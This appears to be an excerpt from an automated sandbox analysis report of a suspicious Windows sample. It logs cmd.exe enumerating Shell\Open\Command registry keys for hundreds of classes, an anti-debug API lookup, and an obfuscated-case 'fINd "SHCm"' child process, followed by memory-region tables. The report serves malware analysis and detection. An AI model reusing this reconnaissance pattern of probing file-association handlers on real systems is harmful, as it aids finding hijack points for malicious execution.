Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scripting.Dictionary\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scripting.Encoder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scripting.FileSystemObject\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scripting.Signer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\scriptlet\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.Behavior\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.Constructor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.Context\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.Factory\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.HiFiTimer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.HostEncode\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.SvrOm\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.TypeLib\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\scriptletfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptletHandler.ASP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptletHandler.Automation\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptletHandler.Behavior\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptletHandler.Event\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptoSys.Scripto\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptoSys.Scripto.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDBACKUPCONFIG.SdBackupConfig\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDBACKUPCONFIG.SdBackupConfig.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\sdchange.sdchangeobj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\sdchange.sdchangeobj.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDConfig.AutoPlayHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDConfig.AutoPlayHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDENGINE.CSdGITManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDENGINE.CSdGITManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDENGINE.CSdWhcNotifier\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDENGINE.CSdWhcNotifier.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDENGINE.SdEngine2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDENGINE.SdEngine2.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SdrService.SdController\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SdrService.SdController.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SdrService.SdrRestoreService\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SdrService.SdrRestoreService.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDRun.AutoPlayHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDRun.AutoPlayHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDSHELLEXTENSION.SdShellExtension\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDSHELLEXTENSION.SdShellExtension.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDSnapin.SDSnapin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDSnapin.SDSnapin.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDSnapinAbout.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\search\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\search-ms\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CollatorDSO\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CollatorDSO.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CollatorErrors\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CollatorErrors.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CommandCreator\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CommandCreator.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CscHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CscHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CustomWordbreaker\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CustomWordbreaker.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.DirMonitorNotifier\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.DirMonitorNotifier.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedGatherMgr\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedGatherMgr.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedGatherNotify\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedGatherNotify.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedGatherNotifyInline\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedGatherNotifyInline.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedSearchSvcAdmin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedSearchSvcAdmin.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.FileHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.FileHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.FilesystemBackupProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.FilesystemBackupProvider.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.FilterRegistration\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.FilterRegistration.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.Gatherer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.Gatherer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GathererLogFileProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GathererLogFileProvider.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherMgr\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherMgr.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherNotify\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherNotify.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherNotifyInline\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherNotifyInline.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherTrx\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherTrx.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.Indexer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.Indexer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.JetPropStore\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.JetPropStore.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.LanguageResource\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.LanguageResource.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.LoadLangRes\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.LoadLangRes.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.MAPI2Handler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.MAPI2Handler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.MapPI\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.MapPI.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.MediaCenterHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.MediaCenterHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.NlCiIndex\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.NlCiIndex.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.NullWB\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.NullWB.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.OneIndexHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.OneIndexHandler.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.OutlookToolbar\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.OutlookToolbar.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.ShellFolder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.ShellFolder.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.ShellFolderr.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.StickyNotesHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.StickyNotesHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.TripoliIndexer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.TripoliIndexer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.XmlContentFilter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.XmlContentFilter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SearchConnectorFolder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SearchFolder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SecurityDescriptor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.Sensor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.Sensor.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.SensorCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.SensorCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.SensorDataReport\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.SensorDataReport.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.SensorManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.SensorManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\service\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\service4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShapeCollector.ShapeCollector\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShapeCollector.ShapeCollector.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShapewareVISIO10\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShapewareVISIO20\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.ClipboardCtl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.ClipboardCtl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.DragDownloadCtl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.DragDownloadCtl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.DragUploadCtl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.DragUploadCtl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.ExportDatabase\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OfflineClient\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OpenDocuments\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OpenDocuments.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OpenDocuments.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OpenDocuments.3\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OpenDocuments.4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OpenDocuments.5\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.SpreadsheetLauncher\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.SpreadsheetLauncher.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.SpreadsheetLauncher.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.StssyncHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.StssyncHandler.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.StssyncHandler.3\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePointWorkspace.Application.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SHCmdFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Application\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Application.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Autoplay\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Autoplay.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.CDBurn\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Explorer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Explorer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Explorer.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.FolderView\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.FolderView.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.HWEventHandlerShellExecute\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.HWEventHandlerShellExecute.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.UIHelper\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.UIHelper.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShellNameSpace.ShellNameSpace\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShellNameSpace.ShellNameSpace.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.10\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.11\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.3\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.5\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.6\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.7\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.8\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.9\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\sip\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\sips\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SKBMonitor.KeyStrokeMonitor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SKBMonitor.KeyStrokeMonitor.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SketchObj.SketchInk\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SketchObj.SketchInk.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\skypecast15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Snapins.FolderSnapin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Snapins.FolderSnapin.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Snapins.HTMLSnapin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Snapins.HTMLSnapin.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Snapins.OCXSnapin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Snapins.OCXSnapin.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\soap\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SOFTWARE\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SoftwareDistribution.VistaWebControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SoftwareDistribution.VistaWebControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\solution_utils.dll.CSD\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\solution_utils.dll.CustomProperty\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\solution_utils.dll.CustomPropertySet\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\solution_utils.dll.CustomPropertySets\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\solution_utils.dll.PropertySetDefs\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SoundRec\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SPCFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SpeechUX.ConfigUI\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SpeechUX.ConfigUI.1\Shell\Open\Command - False 1
Fn
For performance reasons, the remaining 1196 entries are omitted.
The remaining entries can be found in glog.xml.
Module (10)
»
Operation Module Additional Information Success Count Logfile
Load ADVAPI32.dll base_address = 0x7feff0e0000 True 1
Fn
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegEnumKeyW, address_out = 0x7feff0fbf20 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:12 (UTC) True 1
Fn
Get Time type = Ticks, time = 137561 True 1
Fn
Environment (9)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Process #6: find.exe
0 0
»
Information Value
ID #6
File Name c:\windows\system32\find.exe
Command Line fINd "SHCm"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:39, Reason: Child Process
Unmonitor End Time: 00:01:42, Reason: Self Terminated
Monitor Duration 00:00:03
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xaf0
Parent PID 0xae0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AF4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory r True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory rw True False False -
find.exe.mui 0x000e0000 0x000e0fff Memory Mapped File rw False False False -
private_0x00000000000f0000 0x000f0000 0x0016ffff Private Memory rw True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory rw True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x002cffff Private Memory rw True False False -
private_0x00000000002d0000 0x002d0000 0x003cffff Private Memory rw True False False -
private_0x00000000004a0000 0x004a0000 0x004affff Private Memory rw True False False -
pagefile_0x00000000004b0000 0x004b0000 0x00637fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000640000 0x00640000 0x007c0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007d0000 0x007d0000 0x01bcffff Pagefile Backed Memory r True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
find.exe 0xffdc0000 0xffdc7fff Memory Mapped File rwx False False False -
ulib.dll 0x7fee56b0000 0x7fee56d7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
advapi32.dll 0x7feff0e0000 0x7feff1bafff Memory Mapped File rwx False False False -
sechost.dll 0x7feff1c0000 0x7feff1defff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
